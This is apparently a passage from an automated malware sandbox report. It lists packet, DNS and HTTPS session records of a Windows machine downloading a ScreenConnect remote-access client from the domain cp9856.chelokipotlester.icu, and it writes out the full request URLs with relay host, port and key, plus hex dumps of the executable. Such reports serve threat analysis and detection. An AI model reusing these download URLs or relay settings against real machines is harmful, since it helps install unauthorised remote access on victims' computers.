                                                                                                                                                                              Oct 29, 2024 19:35:50.494385958 CET4434974213.107.219.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.494455099 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.494890928 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:35:50.494903088 CET4434974213.107.219.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.691487074 CET49743443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:50.691540003 CET44349743204.79.197.200192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:50.691667080 CET49743443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:50.691900015 CET49743443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:50.691917896 CET44349743204.79.197.200192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:51.023071051 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:51.023971081 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:51.038132906 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:51.272423983 CET4434974213.107.219.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:51.272595882 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:35:51.449004889 CET44349743204.79.197.200192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:51.449134111 CET49743443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:35:55.007014990 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:35:56.005172014 CET4434974213.107.219.254192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:56.005287886 CET49742443192.168.2.1613.107.219.254
                                                                                                                                                                              Oct 29, 2024 19:36:00.638035059 CET49675443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:36:00.638048887 CET49677443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:36:00.653992891 CET49674443192.168.2.16204.79.197.200
                                                                                                                                                                              Oct 29, 2024 19:36:04.611267090 CET49683443192.168.2.16204.79.197.222
                                                                                                                                                                              Oct 29, 2024 19:36:08.922319889 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:08.922380924 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:08.922585964 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:08.922874928 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:08.922889948 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.779602051 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.781260014 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:09.781291962 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.781713963 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.782191992 CET49744443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:36:09.782274961 CET44349744142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:36:09.833048105 CET49744443192.168.2.16142.250.185.228

                                                                                                                                                                              UDP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 29, 2024 19:34:03.982491970 CET53534871.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:04.009872913 CET53520951.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:04.892595053 CET4948553192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:04.892791033 CET6037653192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:04.904831886 CET53494851.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:04.908642054 CET53603761.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:05.255362034 CET53644471.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:08.812669039 CET5074553192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:08.812942982 CET5338053192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:08.821614981 CET53507451.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:08.822904110 CET53533801.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:22.169850111 CET53627931.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:30.126998901 CET5284953192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:34:30.142971992 CET53528491.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:41.236195087 CET53513691.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:03.916229963 CET53506551.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:03.935486078 CET53573851.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:10.496572971 CET138138192.168.2.16192.168.2.255
                                                                                                                                                                              Oct 29, 2024 19:35:23.151359081 CET6343453192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:35:23.627223015 CET53634341.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:32.984000921 CET53511651.1.1.1192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:35:48.056770086 CET5445153192.168.2.161.1.1.1
                                                                                                                                                                              Oct 29, 2024 19:35:48.563746929 CET53544511.1.1.1192.168.2.16

                                                                                                                                                                              DNS Queries

                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 29, 2024 19:34:04.892595053 CET192.168.2.161.1.1.10x99eaStandard query (0)cp9856.chelokipotlester.icuA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:04.892791033 CET192.168.2.161.1.1.10xd64fStandard query (0)cp9856.chelokipotlester.icu65IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:08.812669039 CET192.168.2.161.1.1.10x80dcStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:08.812942982 CET192.168.2.161.1.1.10x1e1eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:30.126998901 CET192.168.2.161.1.1.10xfa79Standard query (0)cp9856.chelokipotlester.icuA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:35:23.151359081 CET192.168.2.161.1.1.10x285cStandard query (0)cp3back96.siteA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:35:48.056770086 CET192.168.2.161.1.1.10x596cStandard query (0)cp3back96.siteA (IP address)IN (0x0001)false

                                                                                                                                                                              DNS Answers

                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 29, 2024 19:34:04.904831886 CET1.1.1.1192.168.2.160x99eaNo error (0)cp9856.chelokipotlester.icu37.221.67.19A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:08.821614981 CET1.1.1.1192.168.2.160x80dcNo error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:08.822904110 CET1.1.1.1192.168.2.160x1e1eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:30.142971992 CET1.1.1.1192.168.2.160xfa79No error (0)cp9856.chelokipotlester.icu37.221.67.19A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:34.450767040 CET1.1.1.1192.168.2.160x7589No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:34.450767040 CET1.1.1.1192.168.2.160x7589No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:35.303067923 CET1.1.1.1192.168.2.160xfc73No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:35.303067923 CET1.1.1.1192.168.2.160xfc73No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:36.527394056 CET1.1.1.1192.168.2.160x4958No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:36.527394056 CET1.1.1.1192.168.2.160x4958No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:56.332201004 CET1.1.1.1192.168.2.160x12a5No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:34:56.332201004 CET1.1.1.1192.168.2.160x12a5No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:35:17.335035086 CET1.1.1.1192.168.2.160x94b9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:35:17.335035086 CET1.1.1.1192.168.2.160x94b9No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:35:23.627223015 CET1.1.1.1192.168.2.160x285cNo error (0)cp3back96.site37.221.67.19A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 29, 2024 19:35:48.563746929 CET1.1.1.1192.168.2.160x596cNo error (0)cp3back96.site37.221.67.19A (IP address)IN (0x0001)false

                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                              • cp9856.chelokipotlester.icu
                                                                                                                                                                              • slscr.update.microsoft.com
                                                                                                                                                                              • https:
                                                                                                                                                                                • www.bing.com
                                                                                                                                                                                • fp.msedge.net
                                                                                                                                                                                • c-ring.msedge.net

                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.164970537.221.67.194436960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:06 UTC1184OUTGET /Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r= HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                              Sec-Fetch-User: ?1
                                                                                                                                                                              Sec-Fetch-Dest: document
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                              2024-10-29 18:34:06 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 86304
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Content-Disposition: inline; filename="support.Client.exe"; filename*=UTF-8''support.Client.exe
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:06 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              2024-10-29 18:34:06 UTC16056INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a1 4c 6c e8 e5 2d 02 bb e5 2d 02 bb e5 2d 02 bb 51 b1 f3 bb ef 2d 02 bb 51 b1 f1 bb 9f 2d 02 bb 51 b1 f0 bb fd 2d 02 bb 65 56 07 ba c0 2d 02 bb 65 56 06 ba f4 2d 02 bb 65 56 01 ba f1 2d 02 bb ec 55 91 bb e0 2d 02 bb e5 2d 03 bb 86 2d 02 bb 6b 56 0a ba e4 2d 02 bb 6b 56 fd bb e4 2d 02 bb 6b 56 00 ba e4 2d 02 bb 52 69 63 68 e5 2d 02 bb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Ll---Q-Q-Q-eV-eV-eV-U---kV-kV-kV-Rich-
                                                                                                                                                                              2024-10-29 18:34:06 UTC16384INData Raw: 8d 5f 01 03 d9 6a 01 53 e8 87 fd ff ff 8b f0 59 59 85 ff 74 12 57 ff 75 0c 53 56 e8 23 2f 00 00 83 c4 10 85 c0 75 35 ff 75 fc 2b df 8d 04 3e ff 75 08 53 50 e8 0a 2f 00 00 83 c4 10 85 c0 75 1c 8b 4d 14 56 e8 c9 01 00 00 6a 00 8b f0 e8 9f fd ff ff 59 8b c6 5e 5b 5f 8b e5 5d c3 33 c0 50 50 50 50 50 e8 6d fc ff ff cc 8b ff 55 8b ec 81 ec 50 01 00 00 a1 00 10 41 00 33 c5 89 45 fc 8b 4d 0c 53 8b 5d 08 56 8b 75 10 57 89 b5 b8 fe ff ff eb 19 8a 01 3c 2f 74 17 3c 5c 74 13 3c 3a 74 0f 51 53 e8 f1 2e 00 00 59 59 8b c8 3b cb 75 e3 8a 11 80 fa 3a 75 17 8d 43 01 3b c8 74 10 56 33 ff 57 57 53 e8 0b ff ff ff 83 c4 10 eb 7a 33 ff 80 fa 2f 74 0e 80 fa 5c 74 09 80 fa 3a 74 04 8b c7 eb 03 33 c0 40 0f b6 c0 2b cb 41 f7 d8 68 40 01 00 00 1b c0 23 c1 89 85 b4 fe ff ff 8d 85 bc
                                                                                                                                                                              Data Ascii: _jSYYtWuSV#/u5u+>uSP/uMVjY^[_]3PPPPPmUPA3EMS]VuW</t<\t<:tQS.YY;u:uC;tV3WWSz3/t\t:t3@+Ah@#
                                                                                                                                                                              2024-10-29 18:34:06 UTC16384INData Raw: 83 20 00 e8 79 bd ff ff c7 00 09 00 00 00 e8 b2 bc ff ff 83 c8 ff e8 2d 91 ff ff c3 8b ff 55 8b ec 83 ec 30 a1 00 10 41 00 33 c5 89 45 fc 8b 4d 10 89 4d f8 56 8b 75 08 57 8b 7d 0c 89 7d d0 85 c9 75 07 33 c0 e9 ce 01 00 00 85 ff 75 1f e8 1b bd ff ff 21 38 e8 27 bd ff ff c7 00 16 00 00 00 e8 60 bc ff ff 83 c8 ff e9 ab 01 00 00 53 8b c6 8b de c1 fb 06 83 e0 3f 6b d0 30 89 5d e4 8b 04 9d 38 1f 41 00 89 45 d4 89 55 e8 8a 5c 10 29 80 fb 02 74 05 80 fb 01 75 28 8b c1 f7 d0 a8 01 75 1d e8 c8 bc ff ff 83 20 00 e8 d3 bc ff ff c7 00 16 00 00 00 e8 0c bc ff ff e9 51 01 00 00 8b 45 d4 f6 44 10 28 20 74 0f 6a 02 6a 00 6a 00 56 e8 3f 04 00 00 83 c4 10 56 e8 e4 fa ff ff 59 84 c0 74 39 84 db 74 22 fe cb 80 fb 01 0f 87 ee 00 00 00 ff 75 f8 8d 45 ec 57 50 e8 56 fa ff ff 83
                                                                                                                                                                              Data Ascii: y-U0A3EMMVuW}}u3u!8'`S?k0]8AEU\)tu(u QED( tjjjV?VYt9t"uEWPV
                                                                                                                                                                              2024-10-29 18:34:06 UTC16384INData Raw: 69 00 00 00 53 00 61 00 74 00 00 00 53 00 75 00 6e 00 64 00 61 00 79 00 00 00 00 00 4d 00 6f 00 6e 00 64 00 61 00 79 00 00 00 00 00 54 00 75 00 65 00 73 00 64 00 61 00 79 00 00 00 57 00 65 00 64 00 6e 00 65 00 73 00 64 00 61 00 79 00 00 00 54 00 68 00 75 00 72 00 73 00 64 00 61 00 79 00 00 00 00 00 46 00 72 00 69 00 64 00 61 00 79 00 00 00 00 00 53 00 61 00 74 00 75 00 72 00 64 00 61 00 79 00 00 00 00 00 4a 00 61 00 6e 00 00 00 46 00 65 00 62 00 00 00 4d 00 61 00 72 00 00 00 41 00 70 00 72 00 00 00 4d 00 61 00 79 00 00 00 4a 00 75 00 6e 00 00 00 4a 00 75 00 6c 00 00 00 41 00 75 00 67 00 00 00 53 00 65 00 70 00 00 00 4f 00 63 00 74 00 00 00 4e 00 6f 00 76 00 00 00 44 00 65 00 63 00 00 00 4a 00 61 00 6e 00 75 00 61 00 72 00 79 00 00 00 46 00 65 00 62 00 72
                                                                                                                                                                              Data Ascii: iSatSundayMondayTuesdayWednesdayThursdayFridaySaturdayJanFebMarAprMayJunJulAugSepOctNovDecJanuaryFebr
                                                                                                                                                                              2024-10-29 18:34:07 UTC16384INData Raw: 67 57 00 00 87 04 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 f3 01 47 65 74 46 69 6c 65 54 79 70 65 00 69 02 47 65 74 53 74 72 69 6e 67 54 79 70 65 57 00 00 4a 02 47 65 74 50 72 6f 63 65 73 73 48 65 61 70 00 00 d4 02 48 65 61 70 53 69 7a 65 00 00 d2 02 48 65 61 70 52 65 41 6c 6c 6f 63 00 57 01 46 6c 75 73 68 46 69 6c 65 42 75 66 66 65 72 73 00 00 9a 01 47 65 74 43 6f 6e 73 6f 6c 65 43 50 00 00 ac 01 47 65 74 43 6f 6e 73 6f 6c 65 4d 6f 64 65 00 00 67 04 53 65 74 46 69 6c 65 50 6f 69 6e 74 65 72 45 78 00 00 24 05 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 ca 00 44 65 63 6f 64 65 50 6f 69 6e 74 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: gWSetStdHandleGetFileTypeiGetStringTypeWJGetProcessHeapHeapSizeHeapReAllocWFlushFileBuffersGetConsoleCPGetConsoleModegSetFilePointerEx$WriteConsoleWDecodePointer
                                                                                                                                                                              2024-10-29 18:34:07 UTC4712INData Raw: 01 88 a7 f4 60 d2 e4 a8 36 b7 7e 80 7f 3a 60 de 0c ae 5a f1 ff 7c 35 30 37 06 0b 2a 86 48 86 f7 0d 01 09 10 02 2f 31 28 30 26 30 24 30 22 04 20 d2 f6 e4 6d ed 74 22 cc d1 d4 40 57 68 41 36 6f 82 8a da 55 9a ae 33 16 af 4d 1a 9a d4 0c 78 28 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 04 82 02 00 34 ef 4a 4b 29 c4 31 e5 70 f9 58 73 9b 31 9c 2b 3e 0f ba 1d f5 65 89 ba e0 b5 e1 cf 2c e1 d9 9f 0b 0a 9a 8d 03 54 7d 33 b7 1b 72 af ed ad da a4 8f 1d 2b d1 af 82 b4 70 70 3c de 38 2a 14 94 0c d3 bc 48 5a b6 4d 06 c8 59 67 38 3e 8a 3c 69 86 54 30 55 2f 98 87 61 ef 03 59 1c 8a cd 7a 45 35 4d 52 96 24 8e 14 5f 71 d5 7b cf a5 db 5b 62 68 61 a2 e5 45 76 51 70 bf d1 e5 00 3f f0 bd 9d 63 4a db 9a 55 e8 26 74 ea a6 e0 45 e8 8c bb 64 25 f2 27 cb ea 06 84 f8 7f 92 d0 1c 59
                                                                                                                                                                              Data Ascii: `6~:`Z|507*H/1(0&0$0" mt"@WhA6oU3Mx(0*H4JK)1pXs1+>e,T}3r+pp<8*HZMYg8><iT0U/aYzE5MR$_q{[bhaEvQp?cJU&tEd%'Y


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.164971320.109.210.53443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:14 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=F4kWp8EGnV93ywk&MD=V8ZxmMLY HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                                                                              2024-10-29 18:34:14 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              Expires: -1
                                                                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                              MS-CorrelationId: 219e1793-07b0-4419-952b-4e0645eeb4aa
                                                                                                                                                                              MS-RequestId: 228da4e5-39a4-4e5a-a6dd-ee960492f817
                                                                                                                                                                              MS-CV: ZFgW3pTJx06YK5Ye.0
                                                                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:13 GMT
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 24490
                                                                                                                                                                              2024-10-29 18:34:14 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                              2024-10-29 18:34:14 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.164971537.221.67.194437692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-29 18:34:31 UTC628OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session HTTP/1.1
                                                                                                                                                                              Host: cp9856.chelokipotlester.icu
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-29 18:34:31 UTC251INHTTP/1.1 200 OK
                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                              Content-Length: 144124
                                                                                                                                                                              Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                              Server: ScreenConnect/23.9.10.8817-1147775063 Microsoft-HTTPAPI/2.0
                                                                                                                                                                              Date: Tue, 29 Oct 2024 18:34:31 GMT
                                                                                                                                                                              Connection: close
